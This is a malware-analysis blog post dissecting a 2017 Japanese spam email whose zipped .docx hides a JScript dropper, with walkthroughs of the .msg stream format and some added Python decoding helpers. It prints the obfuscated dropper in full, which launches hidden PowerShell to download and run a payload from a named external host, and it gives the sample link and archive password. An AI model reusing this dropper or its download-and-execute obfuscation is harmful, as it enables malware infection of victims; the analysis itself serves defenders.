Yesterday afternoon, there was an alert about a MalSpam attack happening in Japan.
https://www.cc.uec.ac.jp/blogs/news/2017/04/20170425malwaremail.html
Malware authors have been sending malware via zipped attachments in spam emails for a long time, but many people are still puzzled about why and how it works. I will try to fill in the required information: where to look for the relevant details and how to decode some of them.
Firstly, we are going to learn a bit about the .msg file format and how it is used to store a message object in a .msg file, which can then be shared between clients or message stores that use the file system.
In order to analyze the .msg file without Outlook, we can read more about the file format from:
- http://download.microsoft.com/download/5/D/D/5DD33FDF-91F5-496D-9884-0A0B0EE698BB/[MS-OXMSG].pdf
- https://msdn.microsoft.com/en-us/library/cc463912(v=exchg.80).aspx
- http://www.fileformat.info/format/outlookmsg/
The purpose of this post is to give a better technical understanding of how attackers make use of spam emails to spread malware.
[ Sample used in the analysis ]
MD5: 3370c5c8d0f42a33a652de0cc2f923ed
SHA256: 8613d560b4ab064bb6380fd999b65ef1a436b1f16161ef8789137691e8844587
[ Part 1 : Getting Started ]
For those who want to follow along, this is a link to the .msg file: 8613d560b4ab064bb6380fd999b65ef1a436b1f16161ef8789137691e8844587
Do note that this is a MALICIOUS file, so please do the analysis in a “safe” environment. The password to the attachment is “infected29A”.
Now, let’s start getting our hands dirty and open the suspicious .msg file using Profiler.
Each “__substg” stream contains a valuable piece of information. Of the eight hex digits at the end of the stream name, the first four tell you what kind of information it holds (the property ID), and the last four tell you the type (binary, ASCII, Unicode, etc.).
- 0x007d: Message header
- 0x0C1A: Sender name
- 0x0C1F: Sender email
- 0x0E1D: Subject (normalized)
- 0x1000: Message body
Since this is a forwarded email (SOC-Mail00135 【注意:標的型攻撃メール?】FW 固定床炉処理日報), we can see that it is most probably a spoofed email from a Japanese institution.
From: <redacted> [mailto:[email protected]] Sent: Tuesday, April 25, 2017 5:57 PM
[ Part 2 : Email attachment ]
Since we can’t do a proper email investigation, let’s look at the attachments. Open “Root Entry/__attach_version1.0_#00000000” and refer to the specifications again.
- Attachments (0x37xx):
- 0x3701: Attachment data
- 0x3703: Attachment extension
- 0x3704: Attachment filename
- 0x3707: Attachment long filename
- 0x370E: Attachment MIME tag
If we look at “__substg1.0_3704001F”, we will see that the filename of the attachment is “M58A33~1.zip”, and the display name of the attachment (“__substg1.0_3001001F”) is “M58A33530641949.zip”.
Now let’s look at the actual data located within “__substg1.0_37010102”, as shown below.
We can see that the zip file contains a .docx file, “vhlwspyw.docx”.
Now, press “Ctrl+A” to select the entire contents, then copy it into a new file as shown in the image below.
We could now analyse the .docx by hand, but let’s use Profiler instead, since it can already parse this entire Outlook file and identify what is inside the attachment.
As we can see from the image below, the .docx contains an embedded OLE object which is actually a JavaScript file.
The extracted JavaScript looks like this:
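To make the stream naming concrete, here is an added example (my code, not the author's or Profiler's) that parses “__substg1.0_PPPPTTTT” names into property ID and type, decodes the value according to the type, and groups the result by message and numbered attachment. The property names come from the lists above; STREAMS is a constructed in-memory stand-in for what an OLE/CFB reader such as olefile would enumerate from a real .msg file.

```python
import re

# Property ids from the post's lists (message properties and the 37xx attachment range).
PROPERTY_NAMES = {
    0x007D: "transport message headers", 0x0C1A: "sender name", 0x0C1F: "sender email",
    0x0E1D: "normalized subject", 0x1000: "body", 0x3001: "display name",
    0x3701: "attach data", 0x3703: "attach extension", 0x3704: "attach filename",
    0x3707: "attach long filename", 0x370E: "attach mime tag",
}
# A __substg1.0_ stream name ends in PPPPTTTT: PPPP = property id, TTTT = property type.
STREAM_RE = re.compile(r"^(?:__attach_version1\.0_#(\d{8})/)?__substg1\.0_([0-9A-F]{4})([0-9A-F]{4})$")

# Constructed stand-in for a .msg file's streams ("storage/stream" paths); a real file
# would be walked with an OLE/CFB reader such as olefile, but the rules are the same.
STREAMS = {
    "__substg1.0_0C1A001F": "Jane Sender".encode("utf-16-le"),
    "__substg1.0_0C1F001E": b"sender@example.invalid",
    "__substg1.0_0E1D001F": "FW: daily report".encode("utf-16-le"),
    "__attach_version1.0_#00000000/__substg1.0_3001001F": "report.zip".encode("utf-16-le"),
    "__attach_version1.0_#00000000/__substg1.0_3704001F": "REPORT~1.zip".encode("utf-16-le"),
    "__attach_version1.0_#00000000/__substg1.0_3707001F": "report.zip".encode("utf-16-le"),
    "__attach_version1.0_#00000000/__substg1.0_37010102": b"PK\x03\x04" + bytes(26),
}

def parse_stream_name(name):
    """Return (attachment index or None, property id, property type), or None if not a substg."""
    m = STREAM_RE.match(name)
    if not m:
        return None
    attach = int(m.group(1)) if m.group(1) is not None else None
    return attach, int(m.group(2), 16), int(m.group(3), 16)

def decode_value(ptype, raw):
    """Decode by type: 0x001F UTF-16LE string, 0x001E 8-bit string, 0x0102 binary."""
    if ptype == 0x001F:
        return raw.decode("utf-16-le")
    if ptype == 0x001E:
        return raw.decode("cp1252")
    return raw

def summarize(streams):
    """Group decoded properties into the message and its numbered attachments."""
    out = {"message": {}, "attachments": {}}
    for name, raw in streams.items():
        parsed = parse_stream_name(name)
        if parsed is None:  # __properties_version1.0, __nameid, ... are skipped
            continue
        attach, pid, ptype = parsed
        bucket = out["message"] if attach is None else out["attachments"].setdefault(attach, {})
        bucket[PROPERTY_NAMES.get(pid, f"0x{pid:04X}")] = decode_value(ptype, raw)
    return out
```

With olefile, the same summarize() can be fed `{"/".join(p): ole.openstream(p).read() for p in ole.listdir()}` to triage a real file without Outlook.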
// WScript.Shell is used later for RegRead(); the helper removes every occurrence of a filler string.
var iAuQkGfebRzOopE = new ActiveXObject("wsCRipt.shELl");
function qeugztpaOGvCBSch(BMIzENpceOrlfaV, PuzGVDkaoxURNpM)
{
return BMIzENpceOrlfaV.split(PuzGVDkaoxURNpM).join("");
}
// Stage 1: the "A%B" filler hides a registry value path (HKLM\...\CurrentVersion\ProgramFilesDir).
var AOdUSuYncvzHXwIbal = qeugztpaOGvCBSch("H" +
"A%BKA%BLM\SA%BoA%BFA%BTA%BWAA%BrE\mA%BicRoA%BsoA%BfT\WA%BiA%BNdA%" +
"B" +
"oA%BWS\cA%BuA%BrA%BRA%BeNtvA%BEA%BRA%BsIA%BON\pA%BrA%BoA%BgraA%BmFA%BIlesDA%Bir", "A%B");
var WpmDxhzvaiJeOndB = new ActiveXObject("sHEll.appLiCatIOn");
// A dynamically built function (filler "Z") overwrites the variable with the RegRead() result.
var bTKNMHyQhYqRezkSUfw = (new Function(qeugztpaOGvCBSch('AZOdUSuZYZnZcZvZzHXwZIbZaZlZ =Z iZAZ' +
'uZQZkGZfZeZbRZzZOoZpZE' +
'.ZRZeZgZR' +
'eZadZ(AZOZd' +
'ZUSZuZYZncZvzZHZ' +
'XwZIZbaZlZ);', "Z")))();
// Stage 2: the real command, padded with a delimiter that is only known once the registry value is read.
var nKgesGQREcmoyLBtMkI = ('FWFpmDFxhFz' +
'vaFiJFeFOnFdFBF.' +
'FShFelFlFEFxeFcFuFtFeF(F"cFmdF.eFxeF' +
'", "/cF FpiFnFg FlocaFlhoFsFtF F& poFwFeFrFsFhFeFlFlF.FeFxFeF -FexFecFutFiFonpolFicy byFpaFsF' +
's F-FnFopFrFofFiFlFeF -FwFindoFwsFtFyFlFeF hiF' +
'dFdeFnF' +
' F(FnFeFwF-FobFjeFct FsFysFtFeF' +
'm.FnetF.FwFebFcFliFeFntF).downlFoadFf' +
'iFlFe(\'FhFtFtp://cFa.tFrFa' +
'deFlaFtFinosF.Fco/jF' +
's' +
'F90F.F' +
'b' +
'inF?' +
'FLFIOv\',\'%apFpDATa' +
'%FMOFW1F2.eFxe\'F)F; sFtFaFRtF-prFoFCesFS \'F%FaFpFpD' +
'atFaF%FMOFWF1F2.eXE\'F",F F"F"F,F "oFpFenF"F' +
',F 0F);');
// charAt(8327 / 757) is charAt(11); for the usual "C:\Program Files" value that is "F", the stage-2 delimiter.
nKgesGQREcmoyLBtMkI = qeugztpaOGvCBSch(nKgesGQREcmoyLBtMkI, RegExp(AOdUSuYncvzHXwIbal.charAt(8327 / 757)));
var dhbPqtWguwlcOKVB = (new Function(nKgesGQREcmoyLBtMkI))();
// Decoy error message shown to the victim.
var wsh = new ActiveXObject("wscript.shell");
wsh.Popup("Sorry, cant open document");
After deobfuscation, we can see that it uses PowerShell to download the payload from http://ca[.]tradelatinos[.]co/js90.bin?LIOv
However, the payload was unavailable when I tried to grab it, but I’ve found these other js90.bin samples from the same campaign.
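As an added illustration (my code, not from the post), the two filler-removal stages can be reproduced in Python to show why the delimiter ends up being the letter “F” and how the script's split/join helper behaves. The stage-1 string is the sample's own registry-path string; PROGRAM_FILES_DIR is an assumed RegRead() result for a typical host, and STAGE2_SAMPLE is a constructed, harmless stand-in that uses the same padding scheme instead of the real command.

```python
import re

# Stage-1 string as it appears in the dropper (backslashes doubled for Python):
# the "A%B" filler hides the registry value the script will read.
STAGE1 = ("H"
          "A%BKA%BLM\\SA%BoA%BFA%BTA%BWAA%BrE\\mA%BicRoA%BsoA%BfT\\WA%BiA%BNdA%"
          "B"
          "oA%BWS\\cA%BuA%BrA%BRA%BeNtvA%BEA%BRA%BsIA%BON\\pA%BrA%BoA%BgraA%BmFA%BIlesDA%Bir")

# Assumed RegRead() result for that value on a typical host (not taken from the post).
PROGRAM_FILES_DIR = r"C:\Program Files"

# Constructed stage-2 string using the same filler scheme; a harmless stand-in,
# not the sample's PowerShell command.
STAGE2_SAMPLE = ('WFSFcFrFiFpFtF.FEFcFhFoF(F"FhFtFtFpF:F/F/FeFxFaFmFpFlFeF.FiFnFvFaFlFiFdF/'
                 'FsFtFaFgFeF.FbFiFnF"F)F;')

def strip_filler(text, filler):
    """Mirror of qeugztpaOGvCBSch(): text.split(filler).join(''). The script passes
    RegExp("F") on the second call, which splits on exactly the same single letter."""
    return "".join(text.split(filler))

def decode_stage1():
    """Recover the registry path hidden behind the 'A%B' filler."""
    return strip_filler(STAGE1, "A%B")

def derive_delimiter(reg_value):
    """Stage 2's filler is charAt(8327 / 757), i.e. index 11, of the RegRead() result."""
    return reg_value[8327 // 757]

def decode_stage2(obfuscated, reg_value=PROGRAM_FILES_DIR):
    """Strip the host-derived delimiter. The real payload contains no capital 'F'
    (note the lowercased 'downloadfile'), so stripping the letter is lossless."""
    return strip_filler(obfuscated, derive_delimiter(reg_value))

def extract_urls(decoded):
    """Pull URLs out of a decoded stage for blocking and hunting."""
    return re.findall(r"""https?://[^\s'"]+""", decoded)

if __name__ == "__main__":
    print("stage 1 :", decode_stage1())
    print("delim   :", derive_delimiter(PROGRAM_FILES_DIR))
    print("stage 2 :", decode_stage2(STAGE2_SAMPLE))
    print("urls    :", extract_urls(decode_stage2(STAGE2_SAMPLE)))
```

Because the delimiter depends on a registry value, a sandbox whose ProgramFilesDir is not the default (for example a non-English or relocated install) would strip a different letter and the second stage would never decode; that environment dependence is worth remembering when a detonation shows no network activity.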
Hashes of Malicious .DOCX
4e213f6c9e82dc74312f75221bc03afcf2d379a06df27a915e19f677c812e7ae 0b6ef9aea3368bc2677d8ca18f52fbaf195dcf1abd027d44f5e429eb303954d2 147816269769e5d8a047b22c1bbc7b1a137980936dc4d52fc3d3ac1e34275d15 d5a42d7a18ab57657a2be0489557ae770fd6bf83868135416fc5d9f17a387c66 3ede325154e9f63be6972060a0dbb7c61bcc18f6e4895b5048b66e5f4067334f
Hashes of Malware
29e6e888756aeb862703f075037006c42c6bc958aab5fd4814741882cdf44a52 1a29a6fec3a0d32158dcec14fcb4d4900d763c766f0acfddf1223e012f897035 fe0bea3616022c745669124d215d69141ca45f3e55b0ceae7f3c00ae7243369f c22d2a4fe8d38b258ed6c4aee616b64bd88a0a21e4298ef06df1557f63c6654b 34426ed1985a798b4d5c1eef44599f59371dc940e72fb74b1ce3daf190de5b10 8aa66af668318ce1103883f86e5f772d6de6670020f767067187aed0dede834b 9460a705fbbf3805b369b92bff2345c2a763c01738d1bc69d6b25d868ba0869e
These are all Ursnif or Dreambot, and there are articles and reversing tutorials on them, so I shall leave it as an exercise for the readers.
- http://www.seculert.com/blogs/ursnif-deep-technical-dive
- https://www.youtube.com/watch?v=raoL6_0A5aw
Some of the subject titles of the emails are:
「付け出し」,「 発送の御連絡」,「のご注文ありがとうございます」,「固定床炉処理日報 」 , 「給料振込の件」
Thanks & Regards
Jacob Soo
Article Link: http://www.vxsecurity.sg/2017/04/26/technical-teardown-analysing-malspam-attack-標的型攻撃メール/